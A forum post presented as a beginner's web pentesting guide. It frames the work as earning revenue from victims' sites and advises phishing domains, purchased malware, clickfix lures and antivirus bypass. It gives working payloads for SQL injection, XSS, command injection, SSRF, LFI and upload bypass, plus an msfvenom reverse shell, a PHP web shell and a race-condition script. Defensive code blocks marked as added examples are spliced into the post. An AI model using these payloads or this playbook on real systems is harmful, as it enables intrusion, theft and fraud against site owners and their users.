Posted by ScanMap (New Member, joined April 22, 2026), thread author, post #1
Hello, dear readers! In this article, I’ve put together a brief overview of the basics of web application penetration testing. This material will be particularly useful for those who are just planning to start working in this field. More advanced articles will be coming soon.
Where to start?
To get started, you’ll need a secure system running Kali Linux or another Linux distribution. It’s best to use a remote server; this will improve your operational security (OpSec). If you’re interested, I can go into more detail about how to choose a secure device and operating system.
Setting a target
For those who don’t know where to start, I recommend first deciding what kind of revenue you want to generate from the website.
Website monetization is typically achieved through:
- Cards
- Installs
- Leads from databases
- Traffic
Reconnaissance
I will discuss an approach for working with a single specific target (other tools are required for mass-testing).
We navigate to the target website. First, we check which subdomains it has. Kali provides a tool called subfinder for this task (all of these tools are easy to install on other Linux distributions as well).
Code:
subfinder -d target.com -o subdomains.txt
We've identified several subdomains. Now we need to determine exactly what's on those subdomains; there's a browser plugin called Wappalyzer that can help with this. We get the following result:
/blog/wappalyzer.webp
We'll start fuzzing (brute-force testing) with ffuf to identify interesting endpoints; for this we'll use a wordlist from a great repository.
Dictionary
Code:
github.com/danielmiessler/SecLists
Click on any file and a search bar will appear on the left; type “api-endpoints.txt” into it and save the file to the folder where your terminal is open. I also recommend briefly reviewing the other files in this repository.
Code:
ffuf -u https://www.target.com/FUZZ -w api-endpoints.txt -mc 200,301,302,401,403
Be sure to try a Google dork - sometimes this simple method can uncover a lot of interesting information due to incorrect access settings for important files.
Code:
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com ext:sql OR ext:env
Gather basic information about DNS; sometimes this reveals the server’s actual IP address behind a WAF/CDN such as Cloudflare (which provides protection against DDoS attacks, bots, exploitation of known vulnerabilities, etc.).
Code:
d=example.com; for t in A AAAA CNAME MX NS TXT SOA CAA; do o=$(dig +short "$d" "$t"); [ -n "$o" ] && printf '\n[%s]\n%s\n' "$t" "$o"; done
You should also pay attention to the following areas:
- source code repositories;
- social media;
- gathering info about employees;
- searching for leaked strings related to this domain, for example from logs;
- gathering info about the target host: hardware, operating system, firmware;
- gathering info about the target network: DNS, IP addresses, network structure and topology.
The most important thing in this section is to gather as much information as possible about the potential victim. The more information you gather, and the higher its quality, the easier the subsequent steps will be.
Resource Development
This is the preparation phase, during which we select and prepare tools and develop a strategy. Everyone chooses the tools they find easiest to work with.
Purchase the necessary resources, such as:
- Domains (similar to the victims’ domains)
- Servers (abuse-resistant)
- Malware (viruses or backdoors)
- Exploits
- Accounts (on social media, email, cloud services)
- Advertising
Phishing – create a website that mimics the login page for the victim’s admin panel or project management dashboard, purchase a similar domain (replacing “i” with “l”, “o” with “0”, etc.) and distribute the link via email, phone calls, advertisements, postal mail, or social media.
Virus - use our own or rent software compatible with the victim’s operating system. The type of software should be chosen based on the task at hand (HVNC, RAT, stealer, loader). Purchase a certificate for the victim’s OS to bypass antivirus. Send an email with a clickfix (a CAPTCHA containing the payload).
Vulnerability - find errors related to incorrect file access settings, bugs in the code, such as SQLi (extracting data from a database), web cache spoofing, XXE injection (exploiting XML vulnerabilities), and many others. This is the main topic of my article today, and I will discuss it in more detail below.
Initial Access
The ultimate goal of every web hunter. The moment when you finally get what you’ve been searching for so long.
So let’s take a look at a few common vulnerabilities.
Burp Suite is the most convenient tool for modifying requests and responses.
Setting up Burp Suite for Firefox
- Launch Burp Suite
- Install the FoxyProxy extension
- Add a proxy of type Burp
- Go to 127.0.0.1:8080 in your browser and download the certificate; you'll need it to intercept HTTPS traffic.
- Open Firefox settings, type Certificates in the search bar → click “View Certificates...” → Import. Select the cacert.der file, check all the boxes, and confirm.
- Now you can intercept and modify requests.
Let’s start with the well-known SQLi. It helps to have some familiarity with SQL; in short, it’s enough to know that an injected SELECT can make the database return data to you, an ordinary user, that should have remained confidential. Such payloads usually begin with a single quote (') and end with two hyphens (--), the SQL comment marker that discards the rest of the original query.
Example of a vulnerable link
Code:
https://target.com/products?category=Gifts'+OR+1=1--
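To see what that link does to the backend query, here is an added example (not from the original post) in Python with an in-memory SQLite table: the vulnerable handler builds the query by string formatting, the fixed one binds the category as a parameter. The products table and both handlers are constructed for this demonstration.

```python
import sqlite3

# URL-decoded value of the category parameter from the link above.
PAYLOAD = "Gifts' OR 1=1--"

def make_db():
    """Constructed sample catalogue: two released Gifts, one unreleased internal item."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        ("Mug", "Gifts", 1),
        ("Candle", "Gifts", 1),
        ("Prototype", "Internal", 0),   # must never be visible to shoppers
    ])
    return con

def products_vulnerable(con, category):
    """String formatting: the quote closes the literal, OR 1=1 makes the WHERE
    clause always true, and -- comments out the 'AND released = 1' guard."""
    sql = "SELECT name FROM products WHERE category = '%s' AND released = 1" % category
    return [row[0] for row in con.execute(sql)]

def products_safe(con, category):
    """Bound parameter: the value travels separately from the SQL text and is
    compared as data, so the payload simply matches no category."""
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in con.execute(sql, (category,))]

if __name__ == "__main__":
    print("vulnerable:", products_vulnerable(make_db(), PAYLOAD))  # leaks Prototype
    print("safe:      ", products_safe(make_db(), PAYLOAD))        # []
```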
SQLi cheat sheet
The most popular SQL databases are MySQL, PostgreSQL, Oracle, and Microsoft SQL Server; the syntax differs slightly between them.
Combining data from the output (string concatenation):
| Database | Syntax |
| ---------- | ------------------------------------- |
| Oracle | `'foo'\|\|'bar'` |
| Microsoft | `'foo'+'bar'` |
| PostgreSQL | `'foo'\|\|'bar'` |
| MySQL | `'foo' 'bar'` (note the space) or `CONCAT('foo','bar')` |
Cut the data from the output (substring):
| Database | Syntax |
| ---------- | --------------------------- |
| Oracle | `SUBSTR('foobar', 4, 2)` |
| Microsoft | `SUBSTRING('foobar', 4, 2)` |
| PostgreSQL | `SUBSTRING('foobar', 4, 2)` |
| MySQL | `SUBSTRING('foobar', 4, 2)` |
Comment:
| Database | Syntax |
| ---------- | ------------------------------------- |
| Oracle | `--comment` |
| Microsoft | `--comment`, `/*comment*/` |
| PostgreSQL | `--comment`, `/*comment*/` |
| MySQL | `#comment`, `-- comment` (the space after `--` is required), `/*comment*/` |
Data from the tables (listing tables, then the columns of one table):
| Database | Syntax |
| ---------- | ------------------------------------------------------------------------------------------------------------------------------- |
| Oracle | `SELECT * FROM all_tables` then `SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'` |
| Microsoft | `SELECT * FROM information_schema.tables` then `SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'` |
| PostgreSQL | `SELECT * FROM information_schema.tables` then `SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'` |
| MySQL | `SELECT * FROM information_schema.tables` then `SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'` |
IDOR - unauthorized access to sensitive data by enumerating object identifiers (brute force), because the application does not verify whether the current user is authorized to view the object. Example:
Code:
GET /api/user/123/profile
GET /api/user/124/profile
You can try modifying the requests as follows:
Code:
curl -X POST https://target.com/api/user/124/profile
curl -X PUT https://target.com/api/user/124/profile
curl -X DELETE https://target.com/api/user/124/profile
Code:
POST /api/user/124/update
{"role": "admin", "is_admin": true}
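On the server side, the fix for both requests above is the same: the object must belong to the session user, and the update body must pass through an allow-list so that role and is_admin are ignored. An added Python example (not from the original post) with a constructed in-memory user store standing in for the application's database:

```python
class Forbidden(Exception):
    """Raised when the session user does not own the requested object."""

# Constructed sample data. 'role' is server-side state; it is never read from a request.
USERS = {
    123: {"id": 123, "name": "alice", "email": "alice@example.com", "role": "user"},
    124: {"id": 124, "name": "bob",   "email": "bob@example.com",   "role": "user"},
}
# The only fields a user may change about themselves (mass-assignment allow-list).
USER_EDITABLE = {"name", "email"}

def get_profile(session_user_id, requested_id):
    """GET /api/user/<id>/profile: look the object up, then check ownership."""
    profile = USERS.get(requested_id)
    if profile is None or profile["id"] != session_user_id:
        # One answer for 'missing' and 'not yours', so valid ids cannot be
        # enumerated by telling a 403 apart from a 404.
        raise Forbidden("not your profile")
    return profile

def update_profile(session_user_id, requested_id, body):
    """POST /api/user/<id>/update: same ownership check, then apply only allowed
    fields. Returns the rejected field names so the caller can log them; a body
    carrying 'role' or 'is_admin' is worth an alert on its own."""
    profile = get_profile(session_user_id, requested_id)
    for field in USER_EDITABLE & set(body):
        profile[field] = body[field]
    return sorted(set(body) - USER_EDITABLE)

def is_denied(session_user_id, requested_id):
    """True if the access is refused (helper for the demonstration below)."""
    try:
        get_profile(session_user_id, requested_id)
    except Forbidden:
        return True
    return False

if __name__ == "__main__":
    print(get_profile(123, 123)["name"])   # alice
    print(is_denied(123, 124))              # True: 124 is not alice's profile
    print(update_profile(124, 124, {"role": "admin", "is_admin": True, "name": "robert"}))
    print(USERS[124])                       # role still 'user', only name changed
```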
XSS – when user-supplied input is rendered into the page without encoding and executes in the browser. If you discover one of these vulnerabilities, you can extract a session if the cookies are configured incorrectly. Typically, these vulnerabilities are checked in all input fields, and even in file uploads. Examples:
Code:
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>
<ScRiPt>alert(1)</sCrIpT>
<body onload=alert(1)>
<svg/onload=alert(1)>
Command injection - when the backend passes user input to a shell and executes commands on its operating system. Examples:
Code:
; ls
| cat /etc/passwd
&& whoami
$(whoami)
id
Blind (no output is returned, so a time delay shows that the command ran):
Code:
; sleep 10
| ping -c 10 127.0.0.1
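From the defender's side, the XSS and command-injection payloads above are easy to spot in access logs once each request is URL-decoded and matched case-insensitively, which is exactly what the mixed-case and `<svg/onload=` variants are meant to dodge. An added Python example (not from the original post) that runs a few such rules over Apache-style log lines; the log lines, addresses and rules are all constructed for this demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (combined format); IPs are from the documentation range.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Apr/2026:10:01:02 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512
203.0.113.5 - - [22/Apr/2026:10:01:03 +0000] "GET /search?q=%3CsVg/onload%3Dalert(1)%3E HTTP/1.1" 200 512
203.0.113.6 - - [22/Apr/2026:10:02:10 +0000] "GET /ping?host=127.0.0.1%3B%20sleep%2010 HTTP/1.1" 200 33
203.0.113.7 - - [22/Apr/2026:10:03:00 +0000] "GET /search?q=gift%20mugs HTTP/1.1" 200 2048
"""

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Rules run on the decoded request, case-insensitively, so <ScRiPt>, <svg/onload= and
# %3Cscript%3E all collapse to the same thing. The event-handler list is deliberately
# short so ordinary parameters such as ?one=1 are not flagged.
RULES = {
    "xss": re.compile(r"<\s*/?\s*(script|svg|img|iframe|body)\b|\bon(load|error|click|mouseover|focus)\s*=|javascript:", re.I),
    "cmdi": re.compile(r"[;|&`]\s*(sleep|ping|whoami|id|cat|ls)\b|\$\(", re.I),
}

def decode(value, rounds=3):
    """URL-decode repeatedly so a double-encoded %253C (<) is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def triage(log_text):
    """Return (ip, decoded request path, [matched rule names]) for suspicious lines."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        path = decode(m["path"])
        tags = [name for name, rule in RULES.items() if rule.search(path)]
        if tags:
            hits.append((m["ip"], path, tags))
    return hits

if __name__ == "__main__":
    for ip, path, tags in triage(SAMPLE_LOG):
        print(ip, tags, path)
```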
SSRF – the #1 vulnerability according to OWASP 2025. It occurs when a web application can be made to request a URL it was not supposed to access. This exposes internal services, allows bypassing the firewall, and in some cases leads to privilege escalation up to remote code execution (RCE). The vulnerability is caused by a lack of restrictions on outgoing requests, incorrect CORS configuration, and weak input validation. Examples:
Code:
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
Bypass
Code:
http://127.1
http://[::1]
http://127.0.0.1.nip.io
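The bypass list above works against filters that compare the URL string; the check has to be made on the addresses the host actually resolves to. An added Python example (not from the original post) of such a check, with a constructed resolver table standing in for real DNS so it runs offline; the hostnames and addresses in that table are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def literal_ip(host):
    """Normalise numeric hosts, including shorthand such as 127.1 that inet_aton accepts."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    try:
        return socket.inet_ntoa(socket.inet_aton(host))
    except OSError:
        return None

def dns_resolver(host):
    """Real resolver: every address the host maps to, not just the first one."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

# Constructed table that replaces DNS in this demonstration.
FAKE_DNS = {
    "localhost": {"127.0.0.1"},
    "127.0.0.1.nip.io": {"127.0.0.1"},
    "metadata.google.internal": {"169.254.169.254"},
    "www.example.com": {"1.1.1.1"},
}

def fake_resolver(host):
    ip = literal_ip(host)
    return {ip} if ip else FAKE_DNS.get(host, set())

def is_forbidden(addr):
    ip = ipaddress.ip_address(addr)
    return (not ip.is_global or ip.is_private or ip.is_loopback
            or ip.is_link_local or ip.is_multicast or ip.is_unspecified)

def is_safe_fetch_target(url, resolve=dns_resolver):
    """True only if the URL is http(s) and every resolved address is publicly routable."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username or parts.password:      # http://trusted@internal-host tricks
        return False
    try:
        addrs = resolve(parts.hostname)
    except (socket.gaierror, ValueError):
        return False
    return bool(addrs) and not any(is_forbidden(a) for a in addrs)
```

Resolve once and connect to the address you validated, re-validating after any redirect; otherwise a hostname that changes its answer between the check and the fetch still reaches the internal service.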
JWT token validation - these tokens are typically used to identify users. A JWT is signed with the server’s private key, and if that key is compromised, it becomes possible to manipulate the information the backend uses to identify you. Example:
Code:
jwt_tool <TOKEN> -X k -pk public.pem
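The server-side counterpart is a verifier that fixes the algorithm itself instead of trusting the alg field inside the token, which is what defeats the algorithm-confusion checks the jwt_tool command above runs. An added Python example (not from the original post) using only the standard library; the secret key and claims are constructed.

```python
import base64
import hashlib
import hmac
import json

DEMO_KEY = b"constructed-demo-secret"   # constructed; a real key is long and random

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(claims, key):
    """Issue a token the way the server would (HS256 only)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(mac)}"

def verify_hs256(token, key):
    """Return the claims, or None. The algorithm is pinned by the server: a header
    saying 'none', 'RS256' or anything but HS256 is refused before any signature
    logic runs, so rewriting the alg field gains nothing."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(unb64url(header_b64))
        signature = unb64url(sig_b64)
    except (ValueError, UnicodeDecodeError):       # wrong shape, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):  # constant-time comparison
        return None
    try:
        return json.loads(unb64url(payload_b64))
    except (ValueError, UnicodeDecodeError):
        return None

if __name__ == "__main__":
    token = sign_hs256({"sub": 123, "role": "user"}, DEMO_KEY)
    print(verify_hs256(token, DEMO_KEY))        # {'sub': 123, 'role': 'user'}
    print(verify_hs256(token, b"wrong-key"))    # None
```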
Vulnerable file upload – sometimes the server-side component of a system executes a file you upload. Using Metasploit, you can easily create a payload for this purpose.
Creating a reverse shell in Metasploit
/blog/mfconsole.png
/blog/exploit.webp
- Open the console
Code:
msfconsole
- Generate the payload
Code:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<your_ip> LPORT=9001 -f raw -o shell.php
- Start the listener for incoming connections:
Code:
nc -lvnp 9001
Once the payload has executed, a reverse connection will be established from the target system, and you will be able to interact with it via nc.
Code:
# PHP shell
<?php system($_GET['cmd']); ?>
Bypass using an extension
Code:
GIF89a<?php system($_GET['cmd']); ?>
shell.php.jpg
shell.php%00.jpg
shell.PhP
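Each filename in the bypass list above defeats one naive check (case-sensitive extension match, looking at the first extension only, a null byte, a GIF header in front of PHP). An added Python example (not from the original post) of an upload validator that closes all four at once and never reuses the client's filename; the magic-byte table and the test inputs are constructed for the demonstration.

```python
import os
import re
import secrets

# Extension -> bytes the file must start with (constructed; covers the common image types).
IMAGE_MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",            # GIF87a / GIF89a
}
# Server-side script markers: a genuine image never contains these.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script", re.IGNORECASE)

def safe_store_name(client_filename, data):
    """Return a random server-side filename with a vetted extension, or None to reject."""
    if "\x00" in client_filename or "%00" in client_filename:   # shell.php%00.jpg
        return None
    base = os.path.basename(client_filename.replace("\\", "/"))  # drop any path component
    ext = os.path.splitext(base)[1].lower()   # shell.PhP -> .php; shell.php.jpg -> .jpg
    magic = IMAGE_MAGIC.get(ext)
    if magic is None or not data.startswith(magic):  # wrong type, or content lies about it
        return None
    if SCRIPT_MARKERS.search(data):                  # GIF89a<?php ... polyglot
        return None
    # The stored name contains nothing from the client, so no '.php' segment survives.
    return secrets.token_hex(16) + ext
```

Store the result outside the web root, or on a host that serves uploads as static files only, so that even a file that slips through cannot be executed.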
LFI/RFI - the first vulnerability allows reading local files on the server, such as configuration data or other sensitive files. The second involves the ability to load and execute a file from a remote server. Examples:
Code:
../../../../etc/passwd
../../../../var/log/apache2/access.log
Race Condition – if the backend checks the balance and then writes, without locking or an atomic update, concurrent requests can each pass the check; it may then process multiple purchases even though there were only enough funds in the account for one. Example:
Code:
import concurrent.futures, requests

def req():
    # every worker sends the same single-use code at the same moment
    return requests.post('https://target.com/redeem', data={'code': 'GIFT100'})

with concurrent.futures.ThreadPoolExecutor(max_workers=20) as ex:
    [ex.submit(req) for _ in range(20)]
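The server-side fix for that scenario is to make the redemption a single conditional write instead of a read followed by a write. An added Python example (not from the original post) that releases 20 concurrent redemptions of a constructed single-use code against a SQLite file, first with the check-then-act pattern and then with the atomic UPDATE; the table and the code value are constructed.

```python
import os, sqlite3, tempfile, threading, time

def setup_db():
    """Constructed sample: one single-use gift code, not yet redeemed."""
    path = os.path.join(tempfile.mkdtemp(), "shop.db")
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE codes (code TEXT PRIMARY KEY, redeemed INTEGER NOT NULL)")
    con.execute("INSERT INTO codes VALUES ('GIFT100', 0)")
    con.commit()
    con.close()
    return path

def redeem_racy(path, code):
    """Check-then-act: every request that reads redeemed=0 before the first write lands redeems the code."""
    con = sqlite3.connect(path, timeout=10, isolation_level=None)  # autocommit mode
    try:
        row = con.execute("SELECT redeemed FROM codes WHERE code = ?", (code,)).fetchone()
        if row is None or row[0]:
            return False
        time.sleep(0.05)           # stands in for real request/DB latency
        con.execute("BEGIN IMMEDIATE")
        con.execute("UPDATE codes SET redeemed = 1 WHERE code = ?", (code,))
        con.execute("COMMIT")
        return True
    finally:
        con.close()

def redeem_atomic(path, code):
    """Fix: one conditional UPDATE; writers are serialised, so only one request sees rowcount == 1."""
    con = sqlite3.connect(path, timeout=10, isolation_level=None)
    try:
        con.execute("BEGIN IMMEDIATE")            # take the write lock up front
        cur = con.execute("UPDATE codes SET redeemed = 1 WHERE code = ? AND redeemed = 0", (code,))
        con.execute("COMMIT")
        return cur.rowcount == 1
    finally:
        con.close()

def hammer(path, redeem, n=20):
    """Release n threads at once against the same code; return how many succeeded."""
    results, lock, gate = [], threading.Lock(), threading.Barrier(n)
    def worker():
        gate.wait()
        ok = redeem(path, "GIFT100")
        with lock:
            results.append(ok)
    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads: t.start()
    for t in threads: t.join()
    return sum(results)

if __name__ == "__main__":
    print("check-then-act:", hammer(setup_db(), redeem_racy), "redemptions of one code")
    print("atomic update: ", hammer(setup_db(), redeem_atomic), "redemption")
```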
Cheat sheet:
| Parameter | Vulnerability Type |
| ---------- | ---------------------- |
| ?id= | SQL Injection, IDOR |
| ?url= | SSRF |
| ?file= | LFI/RFI |
| ?page= | LFI |
| ?redirect= | Open Redirect |
| ?callback= | JSONP Hijacking |
| ?email= | Email Header Injection |
| ?search= | XSS, SQL Injection |
| ?image= | SSRF |
| ?template= | SSTI |
You may also find the following useful
- Buffer overflow
- Wi-Fi network hacking
- Infection via USB drive
- Supply chain attacks
- Valid credentials
- Exploits
- Content injection
One of these methods is bound to work for you; the key is to apply it correctly, without rushing and keeping your cool. You’ll succeed—you just need to get started. Thank you for reading to the end; I hope you found this article useful and not too boring.
To gain a foothold in the system and achieve results, there are many more steps to follow, but I’ve tried to explain the basics as clearly and simply as possible, without delving into overly technical details. If you’re interested, I can write more articles; there are plenty of topics to cover, and plenty of motivation.
Support the author
If you’d like to support my efforts, I’m running a project designed to help you with the reconnaissance phase - ScanMap.top
I would be infinitely grateful if you could support this content with a small donation:
BTC - bc1qdaq8f2mymek9fulh4x2qtyw0weatq3nvgu2xc0
LTC - ltc1qcrt350wr2pl525hxql57ez9lzd4vpwgx8m6g50
ETH - 0x52FfB2eB2118F46843227DB661F6cB2843beb853
XMR - 88En3TvEMgjSdQAtkWYUv1QWwexgBkW4F2smRTsWBbVzhwvxXf1yFEL2mhWd923rQvQ9LkSimPDDDJh5f97zWAT2SYbtJcM